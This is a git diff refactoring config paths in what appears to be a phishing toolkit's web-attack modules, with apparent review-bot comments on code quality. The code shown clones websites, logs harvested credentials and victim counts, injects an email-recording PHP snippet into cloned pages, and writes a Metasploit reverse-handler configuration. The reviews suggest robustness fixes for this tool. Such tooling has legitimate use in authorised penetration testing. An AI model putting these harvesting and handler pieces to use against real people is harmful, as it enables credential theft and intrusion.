@@ -139,11 +139,11 @@ if choice == "1": # if its a zipfile zip the badboy up if choice == "2": # write to a zipfile here - file = zipfile.ZipFile(setdir + "/template.zip", "w") - for name in glob.glob(setdir + "/dll/*"): + file = zipfile.ZipFile(userconfigpath + "template.zip", "w") + for name in glob.glob(userconfigpath + "dll/*"): file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED) file.close() -if os.path.isfile(setdir + "/msf.exe"): +if os.path.isfile(userconfigpath + "msf.exe"): subprocess.Popen("cp %s/msf.exe %s/src/html/" % - (setdir, definepath), shell=True).wait() + (userconfigpath, definepath), shell=True).wait() diff --git a/src/webattack/harvester/harvester.py b/src/webattack/harvester/harvester.py index ec55d620d..8e9b65e24 100644 --- a/src/webattack/harvester/harvester.py +++ b/src/webattack/harvester/harvester.py @@ -75,7 +75,7 @@ except Exception as err: attack_vector = "" -fileopen = open(setdir + "/attack_vector", "r") +fileopen = open(userconfigpath + "attack_vector", "r") for line in fileopen: line = line.rstrip() if line == 'multiattack': @@ -111,7 +111,7 @@ for line in fileopen: if match2: command_center = "on" command_center_write = open( - setdir + "/cc_harvester_hit" % (setdir), "w") + userconfigpath + "cc_harvester_hit" % (userconfigpath), "w") # if nada default port 80 if counter == 0: @@ -119,7 +119,7 @@ if counter == 0: # pull URL field counter = 0 -fileopen = open(setdir + "/site.template", "r").readlines() +fileopen = open(userconfigpath + "site.template", "r").readlines() for line in fileopen: line = line.rstrip() match = re.search("URL=", line) 
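Review bot: `subprocess.Popen("cp %s/msf.exe %s/src/html/" % (userconfigpath, definepath), shell=True)` in the `-139` hunk is another shell `cp` with interpolated paths and no error check; `shutil.copy(os.path.join(userconfigpath, "msf.exe"), os.path.join(definepath, "src", "html"))` is the direct equivalent. The `glob.glob(userconfigpath + "dll/*")` above it would also mis-match if the config directory itself contained glob characters, which `glob.escape` avoids on Python 3.4+.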
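Review bot: `open(userconfigpath + "cc_harvester_hit" % (userconfigpath), "w")` in harvester.py's `-111` hunk still applies `%` to a literal that contains no conversion specifier, so the line raises `TypeError: not all arguments converted during string formatting` the moment a command-center match is found — the removed line had the same bug and the rename preserved it. `command_center_write = open(os.path.join(userconfigpath, "cc_harvester_hit"), "w")` is the intended expression. As with the other flag files in this patch, the handle is not closed within the hunk.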
@@ -166,10 +166,10 @@ for line in fileopen: sys.path.append("src/core/ssl") # import our ssl module import setssl - subprocess.Popen("cp %s/CA/*.pem %s" % (setdir, setdir), + subprocess.Popen("cp %s/CA/*.pem %s" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() # remove old junk we dont need anymore - subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (setdir, setdir), + subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() # if user wants to specify his/her own PEM certificate @@ -184,7 +184,7 @@ for line in fileopen: print("\nUnable to find PEM file, check location and config again.") exit_set() if os.path.isfile(pem_client): - subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, setdir), + subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() match2 = re.search("PEM_SERVER=", line) if match2: @@ -193,7 +193,7 @@ for line in fileopen: print("\nUnable to find PEM file, check location and config again.") exit_set() if os.path.isfile(pem_server): - subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, setdir), + subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() # url decode for postbacks @@ -211,8 +211,8 @@ def urldecode(url): # here is where we specify how many people actually visited versus fell for it -visits = open(setdir + "/visits.file", "a") -bites = open(setdir + "/bites.file", "a") +visits = open(userconfigpath + "visits.file", "a") +bites = open(userconfigpath + "bites.file", "a") # SET Handler for handling POST requests and general setup through SSL 
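Review bot: `subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (userconfigpath, userconfigpath), shell=True)` in the `-166` hunk runs a recursive delete on a shell-interpolated path; an empty or unexpected `userconfigpath` turns it into `rm -rf /CA`, and a space in the path splits the command. `shutil.rmtree(os.path.join(userconfigpath, "CA"), ignore_errors=True)` deletes the same directory without a shell. The second half of that command copies `*.pem` from the current working directory rather than from `userconfigpath`, which looks unintentional but may depend on an earlier `os.chdir` outside the hunk.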
@@ -247,7 +247,7 @@ class SETHandler(BaseHTTPRequestHandler): #print('-' * 40) pass - webroot = os.path.abspath(os.path.join(setdir, 'web_clone')) + webroot = os.path.abspath(os.path.join(userconfigpath, 'web_clone')) requested_file = os.path.abspath(os.path.join(webroot, self.path)) # try block setup to catch transmission errors try: @@ -256,7 +256,7 @@ class SETHandler(BaseHTTPRequestHandler): self.send_response(200) self.send_header('Content_type', 'text/html') self.end_headers() - fileopen = open(setdir + "/web_clone/index.html", "r") + fileopen = open(userconfigpath + "web_clone/index.html", "r") for line in fileopen: self.wfile.write(line) # write out that we had a visit @@ -268,7 +268,7 @@ class SETHandler(BaseHTTPRequestHandler): self.send_response(200) self.send_header('Content_type', 'text/html') self.end_headers() - fileopen = open(setdir + "/web_clone/index2.html", "r") + fileopen = open(userconfigpath + "web_clone/index2.html", "r") for line in fileopen: self.wfile.write(line) # write out that we had a visit @@ -310,7 +310,7 @@ class SETHandler(BaseHTTPRequestHandler): # change path to root for append on file os.chdir(homepath) # put the params into site.template for later user - filewrite = open(setdir + "/site.template", "a") + filewrite = open(userconfigpath + "site.template", "a") filewrite.write("\n") if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())): filewrite3 = open("%s/src/logs/harvester.log" % os.getcwd(), "w") @@ -356,7 +356,7 @@ class SETHandler(BaseHTTPRequestHandler): # pull URL field counter = 0 - fileopen = open(setdir + "/site.template", "r").readlines() + fileopen = open(userconfigpath + "site.template", "r").readlines() for line in fileopen: line = line.rstrip() match = re.search("URL=", line) 
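Review bot: `requested_file = os.path.abspath(os.path.join(webroot, self.path))` in the `-247` hunk discards `webroot` whenever `self.path` is absolute, and an HTTP request path always begins with `/`, so the computed path is whatever the client asked for rather than something under `web_clone`; what the following `try:` block does with it is outside the hunk, but if the file is opened and served this is an arbitrary file read. `requested_file = os.path.abspath(os.path.join(webroot, self.path.lstrip("/")))` keeps it relative, and `if not requested_file.startswith(webroot + os.sep): return self.send_error(403)` rejects `..` traversal after normalisation. The enclosing handler method starts before this hunk.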
@@ -380,7 +380,7 @@ class SETHandler(BaseHTTPRequestHandler): '' % (RAW_URL)) # set it back to our homepage - os.chdir(setdir + "/web_clone/") + os.chdir(userconfigpath + "web_clone/") class ThreadedHTTPServer(ThreadingMixIn, HTTPServer): 
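Review bot: `os.chdir(userconfigpath + "web_clone/")` in the `-380` hunk changes the process-wide working directory from inside a request handler, and `ThreadedHTTPServer` right below mixes in `ThreadingMixIn`, so two concurrent requests can interleave the `os.chdir(homepath)` of the `-310` hunk with this one and write `harvester.log` (whose path is built from `os.getcwd()`) into the wrong directory. Building absolute paths with `os.path.join(homepath, ...)` instead of chdir-ing removes the shared state; if the chdir must stay, a module-level lock around the chdir/write/chdir sequence is the minimal fix. The handler method this belongs to starts before the hunk.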
@@ -526,37 +526,37 @@ def run(): (logpath, harvester_file), shell=True).wait() # if we are using webjacking, etc. - if os.path.isfile(setdir + "/web_clone/index2.html"): + if os.path.isfile(userconfigpath + "web_clone/index2.html"): # need to copy the files over - remove the old one first if there if os.path.isfile(apache_dir + "/index2.html"): os.remove(apache_dir + "/index2.html") - shutil.copyfile(setdir + "/web_clone/index2.html", + shutil.copyfile(userconfigpath + "web_clone/index2.html", apache_dir + "/index2.html") # here we specify if we are tracking users and such if track_email == True: - fileopen = open(setdir + "/web_clone/index.html", "r") + fileopen = open(userconfigpath + "web_clone/index.html", "r") data = fileopen.read() data = data.replace( "", """ $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (harvester_file)) - filewrite = open(setdir + "/web_clone/index.2", "w") + filewrite = open(userconfigpath + "web_clone/index.2", "w") filewrite.write(data) filewrite.close() - os.remove(setdir + "/web_clone/index.html") - shutil.copyfile(setdir + "/web_clone/index.2", - setdir + "/web_clone/index.html") + os.remove(userconfigpath + "web_clone/index.html") + shutil.copyfile(userconfigpath + "web_clone/index.2", + userconfigpath + "web_clone/index.html") # copy the entire web_clone directory. # Without this only index.php|html are copied even though the user # may have chosen to import the entire directory in the set module. 
- copyfolder(setdir + "/web_clone", apache_dir) + copyfolder(userconfigpath + "web_clone", apache_dir) if os.path.isfile("%s/index.html" % (apache_dir)): os.remove("%s/index.html" % (apache_dir)) if track_email == False: - shutil.copyfile(setdir + "/web_clone/index.html", + shutil.copyfile(userconfigpath + "web_clone/index.html", "%s/index.html" % (apache_dir)) if track_email == True: - shutil.copyfile(setdir + "/web_clone/index.html", + shutil.copyfile(userconfigpath + "web_clone/index.html", "%s/index.php" % (apache_dir)) print_status( "NOTE: The URL to click on is index.php NOT index.html with track emails.") @@ -615,7 +615,7 @@ if webattack_email == True: module_reload(src.phishing.smtp.client.smtp_web) # see if we're tabnabbing or multiattack -fileopen = open(setdir + "/attack_vector", "r") +fileopen = open(userconfigpath + "attack_vector", "r") for line in fileopen: line = line.rstrip() if line == 'tabnabbing': @@ -628,12 +628,12 @@ for line in fileopen: if ssl_flag == 'true': web_port = "443" # check for PEM files here - if not os.path.isfile(setdir + "/newreq.pem"): + if not os.path.isfile(userconfigpath + "newreq.pem"): print("PEM files not detected. SSL will not work properly.") - if not os.path.isfile(setdir + "/newcert.pem"): + if not os.path.isfile(userconfigpath + "newcert.pem"): print("PEM files not detected. SSL will not work properly.") # copy over our PEM files - subprocess.Popen("cp %s/*.pem %s/web_clone/" % (setdir, setdir), + subprocess.Popen("cp %s/*.pem %s/web_clone/" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() # copy patched socket over to web clone definepath = os.getcwd() @@ -643,7 +643,7 @@ if ssl_flag == 'true': # head over to cloned dir if apache_check == False: - os.chdir(setdir + "/web_clone/") + os.chdir(userconfigpath + "web_clone/") if attack_vector != "multiattack": if apache_check == False: 
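Review bot: `subprocess.Popen("cp %s/*.pem %s/web_clone/" % (userconfigpath, userconfigpath), shell=True)` in the `-628` hunk copies the certificate and key through a shell with an interpolated path and discards the exit status, so a failed copy shows up later only as an SSL handshake error. `for pem in glob.glob(os.path.join(userconfigpath, "*.pem")): shutil.copy(pem, os.path.join(userconfigpath, "web_clone"))` is the shell-free equivalent (`glob` would need importing if harvester.py does not already). The two `print("PEM files not detected. SSL will not work properly.")` checks above it emit the same message for `newreq.pem` and `newcert.pem`; naming the missing file would save a round of debugging.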
diff --git a/src/webattack/harvester/report_generator.py b/src/webattack/harvester/report_generator.py index f29ef9b82..db40ad94b 100644 --- a/src/webattack/harvester/report_generator.py +++ b/src/webattack/harvester/report_generator.py @@ -7,8 +7,8 @@ import datetime from src.core.setcore import * # make sure the reports directory is created -if not os.path.isdir(setdir + "/reports/"): - os.makedirs(setdir + "/reports/") +if not os.path.isdir(userconfigpath + "reports/"): + os.makedirs(userconfigpath + "reports/") # # Quick report generation script @@ -33,20 +33,20 @@ definepath = os.getcwd() # grab URL and report information now = datetime.datetime.today() -fileopen = open(setdir + "/site.template", "r") -site_template = open(setdir + "/site.template", "r").readlines() +fileopen = open(userconfigpath + "site.template", "r") +site_template = open(userconfigpath + "site.template", "r").readlines() fileopen1 = open("%s/src/core/reports/index.html" % (definepath), "r") for line in fileopen: match = re.search("URL=", line) if match: url = line.replace("URL=http://", "") url = line.replace("URL=https://", "") - filewrite2 = open(setdir + "/reports/%s.xml" % (now), "a") + filewrite2 = open(userconfigpath + "reports/%s.xml" % (now), "a") filewrite2.write(r"""""" + "\n") filewrite2.write(r"" + "\n") for line2 in fileopen1: counter = 0 - filewrite = open(setdir + "/reports/%s.html" % (now), "a") + filewrite = open(userconfigpath + "reports/%s.html" % (now), "a") match1 = re.search("REPLACEHEREDUDE", line2) if match1: line2 = line2.replace("REPLACEHEREDUDE", url) @@ -83,8 +83,8 @@ for line in fileopen: # look for how many people visited the website match5 = re.search("VISITORSHERE", line2) if match5: - if os.path.isfile(setdir + "/visits.file"): - fileopen3 = open(setdir + "/visits.file", "r") + if os.path.isfile(userconfigpath + "visits.file"): + fileopen3 = open(userconfigpath + "visits.file", "r") counter5 = 0 for line in fileopen3: if line != "": 
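Review bot: In the `-33` hunk the two context lines `url = line.replace("URL=http://", "")` and `url = line.replace("URL=https://", "")` both start from `line`, so for an `http://` site the second assignment overwrites the first and `url` keeps its `URL=http://` prefix when it is spliced into the report. Chaining them as `url = line.rstrip().replace("URL=http://", "").replace("URL=https://", "")` strips whichever scheme is present and the trailing newline. The report names built from `now` (a `datetime.today()` value) contain spaces and colons, which a `strftime` would avoid if the reports are ever handled from a shell.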
@@ -92,7 +92,7 @@ for line in fileopen: counter5 = counter5 + 1 if line == "": counter5 = 0 - if not os.path.isfile(setdir + "/visits.file"): + if not os.path.isfile(userconfigpath + "visits.file"): counter5 = 0 line2 = line2.replace("VISITORSHERE", str(counter5), 2) @@ -101,13 +101,13 @@ for line in fileopen: match6 = re.search("BITESHERE", line2) if match6: - if os.path.isfile(setdir + "/bites.file"): - fileopen4 = open(setdir + "/bites.file", "r") + if os.path.isfile(userconfigpath + "bites.file"): + fileopen4 = open(userconfigpath + "bites.file", "r") counter5 = 0 for line in fileopen4: line = line.rstrip() counter5 = counter5 + 1 - if not os.path.isfile(setdir + "/bites.file"): + if not os.path.isfile(userconfigpath + "bites.file"): counter5 = 0 line2 = line2.replace("BITESHERE", str(counter5)) @@ -125,6 +125,6 @@ except: pass subprocess.Popen("cp -rf %s/src/core/reports/files %s/reports/" % (definepath, - setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() -print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (setdir, now) + bcolors.ENDC) -print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (setdir, now) + bcolors.ENDC) + userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() +print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC) +print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC) diff --git a/src/webattack/harvester/scraper.py b/src/webattack/harvester/scraper.py index 096cb8b23..29c350331 100644 --- a/src/webattack/harvester/scraper.py +++ b/src/webattack/harvester/scraper.py 
@@ -24,13 +24,13 @@ else: # set the multiattack tabnabbing/webjacking flag multi_tabnabbing = "off" multi_webjacking = "off" -if os.path.isfile(setdir + "/multi_tabnabbing"): +if os.path.isfile(userconfigpath + "multi_tabnabbing"): multi_tabnabbing = "on" -if os.path.isfile(setdir + "/multi_webjacking"): +if os.path.isfile(userconfigpath + "multi_webjacking"): multi_webjacking = "on" # see if we're tabnabbing -fileopen = open(setdir + "/attack_vector", "r") +fileopen = open(userconfigpath + "attack_vector", "r") for line in fileopen: line = line.rstrip() if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on": @@ -59,8 +59,8 @@ if apache_mode == "on": apache_rewrite = "post.php" # start the scraping process -fileopen = open(setdir + "/web_clone/%s" % (site), "r").readlines() -filewrite = open(setdir + "/web_clone/index.html.new", "w") +fileopen = open(userconfigpath + "web_clone/%s" % (site), "r").readlines() +filewrite = open(userconfigpath + "web_clone/index.html.new", "w") for line in fileopen: # specify if it found post params @@ -102,9 +102,9 @@ for line in fileopen: # close the file filewrite.close() # move our newly created website with our post stuff to our cloned area -if os.path.isfile(setdir + "/web_clone/index.html.new"): - shutil.copyfile(setdir + "/web_clone/index.html.new", setdir + "/" + site) - if os.path.isfile(setdir + "/web_clone/" + site): - os.remove(setdir + "/web_clone/" + site) - shutil.move(setdir + "/web_clone/index.html.new", - setdir + "/web_clone/%s" % (site)) +if os.path.isfile(userconfigpath + "web_clone/index.html.new"): + shutil.copyfile(userconfigpath + "web_clone/index.html.new", userconfigpath + "" + site) + if os.path.isfile(userconfigpath + "web_clone/" + site): + os.remove(userconfigpath + "web_clone/" + site) + shutil.move(userconfigpath + "web_clone/index.html.new", + userconfigpath + "web_clone/%s" % (site)) 
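Review bot: `shutil.copyfile(userconfigpath + "web_clone/index.html.new", userconfigpath + "" + site)` in the `-102` hunk keeps an empty-string literal where the old `"/"` separator was, which reads like a leftover of the search-and-replace; `os.path.join(userconfigpath, site)` says what is meant and works with or without a trailing separator. The `os.remove` of the old `site` followed by `shutil.move` of `index.html.new` over it can collapse into the single `shutil.move(...)`, since on POSIX it already replaces an existing destination file.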
diff --git a/src/webattack/hta/main.py b/src/webattack/hta/main.py index 56ba49a61..6691874c2 100644 --- a/src/webattack/hta/main.py +++ b/src/webattack/hta/main.py @@ -56,16 +56,16 @@ def gen_hta_cool_stuff(): html_code = ("""\n""" % url) # metasploit answer file here - filewrite = open(setdir + "/meta_config", "w") + filewrite = open(userconfigpath + "meta_config", "w") filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port)) filewrite.close() # write out main1 and main2 - filewrite = open(setdir + "/hta_index", "w") + filewrite = open(userconfigpath + "hta_index", "w") filewrite.write(html_code) filewrite.close() # write out launcher.hta - filewrite = open(setdir + "/Launcher.hta", "w") + filewrite = open(userconfigpath + "Launcher.hta", "w") filewrite.write(main1 + main2 + main3 + main4) filewrite.close() diff --git a/src/webattack/multi_attack/multiattack.py b/src/webattack/multi_attack/multiattack.py index 1fb6a51b6..52d57df9c 100644 --- a/src/webattack/multi_attack/multiattack.py +++ b/src/webattack/multi_attack/multiattack.py @@ -51,12 +51,12 @@ def flag_off(vector): def write_file(filename, results): - filewrite = open(setdir + "/%s" % (filename), "w") + filewrite = open(userconfigpath + "%s" % (filename), "w") filewrite.write(results) filewrite.close() # specify attackvector -filewrite = open(setdir + "/attack_vector", "w") +filewrite = open(userconfigpath + "attack_vector", "w") filewrite.write("multiattack") filewrite.close() 
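Review bot: `write_file` in multiattack.py's `-51` hunk builds its path as `userconfigpath + "%s" % (filename)`, where the `%` formatting does nothing beyond a plain concatenation. `with open(os.path.join(userconfigpath, filename), "w") as filewrite: filewrite.write(results)` is the equivalent with the join made explicit and the handle closed even if the write raises. A one-line docstring such as `"""Write results to <filename> inside the SET user config directory."""` would help, since the helper is reused for several flag files.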
@@ -79,14 +79,14 @@ webdav_enable = "OFF"
 
 # see if we are running a custom cloned website
 clonedurl = 0
-fileopen = open(setdir + "/site.template", "r")
+fileopen = open(userconfigpath + "site.template", "r")
 data = fileopen.read()
 if "TEMPLATE=SELF" in data:
     clonedurl = 1
 
 # clean up cloner directory
 if clonedurl == 0:
-    subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (setdir, setdir),
+    subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (userconfigpath, userconfigpath),
                      stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
 
 # set a quick loop to see what the user wants
@@ -349,7 +349,7 @@ if meta_attack == "on":
 
     # this checks to see if the MSF payload uses webdav, if so we have to
     # force port 80
-    if os.path.isfile(setdir + "/webdav_enabled"):
+    if os.path.isfile(userconfigpath + "webdav_enabled"):
         webdav_enabled = "on"
 
 # set this incase msf attack, java applet, and harvester is needed
diff --git a/src/webattack/tabnabbing/tabnabbing.py b/src/webattack/tabnabbing/tabnabbing.py
index 69ec26bcf..701d36fa9 100644
--- a/src/webattack/tabnabbing/tabnabbing.py
+++ b/src/webattack/tabnabbing/tabnabbing.py
@@ -18,13 +18,13 @@ for line in fileopen:
         webjacking_timing = line
 
 # grab attack_vector specification
-fileopen = open(setdir + "/attack_vector", "r")
+fileopen = open(userconfigpath + "attack_vector", "r")
 for line in fileopen:
     attack_vector = line.rstrip()
 
 # need to see if we created file to trigger multi attack webjacking
 multi_webjacking = "off"
-if os.path.isfile(setdir + "/multi_webjacking"):
+if os.path.isfile(userconfigpath + "multi_webjacking"):
     multi_webjacking = "on"
 
 
@@ -34,7 +34,7 @@ if check_options("IPADDR=") != 0:
     ipaddr = check_options("IPADDR=")
 
 # pull URL field so we can pull favicon later on
-fileopen = open(setdir + "/site.template", "r").readlines()
+fileopen = open(userconfigpath + "site.template", "r").readlines()
 for line in fileopen:
     match = re.search("URL=", line)
     if match:
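Review bot: The `rm -rf %s/web_clone;mkdir %s/web_clone/` command interpolates `userconfigpath` unquoted into a `shell=True` string, so a config path containing a space or shell metacharacter breaks the command, and with the trailing separator the commit now assumes, the interpolated path only works because POSIX tolerates a doubled slash. The same effect without a shell is `web_clone = os.path.join(userconfigpath, "web_clone")`, `shutil.rmtree(web_clone, ignore_errors=True)`, `os.makedirs(web_clone)` (`shutil` would need importing here if this file does not already). The `mv` command in the tabnabbing.py hunk at @@ -48 has the same shape and could use `shutil.move` on joined paths instead.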
@@ -48,12 +48,12 @@ for line in fileopen:
 
 # move cloned site to index2.html
 subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" %
-                 (setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+                 (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
 
 # grab the source and write it out to the cloned directory
 fileopen = open("src/webattack/tabnabbing/source.js", "r")
 # write it to dir
-filewrite = open(setdir + "/web_clone/source.js", "w")
+filewrite = open(userconfigpath + "web_clone/source.js", "w")
 # loop
 for line in fileopen:
     line = line.rstrip()
@@ -66,10 +66,10 @@ filewrite.close()
 
 if attack_vector == "tabnabbing":
     # grab favicon
     favicon = urllib.urlopen("%s/favicon.ico" % (URL))
-    output = open(setdir + '/web_clone/favicon.ico', 'wb')
+    output = open(userconfigpath + '/web_clone/favicon.ico', 'wb')
     output.write(favicon.read())
     output.close()
-    filewrite1 = open(setdir + "/web_clone/index.html", "w")
+    filewrite1 = open(userconfigpath + "/web_clone/index.html", "w")
     filewrite1.write( '\n')
     filewrite1.write("\n")
@@ -79,7 +79,7 @@ if attack_vector == "tabnabbing":
 
 # define webjacking or multi webjacking here
 if attack_vector == "webjacking" or multi_webjacking == "on":
-    filewrite1 = open(setdir + "/web_clone/index.html", "w")
+    filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
     filewrite1.write("
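Review bot: `open(userconfigpath + '/web_clone/favicon.ico', 'wb')` in the @@ -66 hunk keeps its leading slash while the sibling `index.html` line two lines below drops it, so under the trailing-separator convention the rest of the commit adopts this one path is built with a doubled slash and diverges from the stated normalization; `userconfigpath + 'web_clone/favicon.ico'`, or `os.path.join(userconfigpath, 'web_clone', 'favicon.ico')`, keeps the hunk consistent. `output` and `filewrite1` are also opened without `with`, so a failing `favicon.read()` leaves the handle open.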
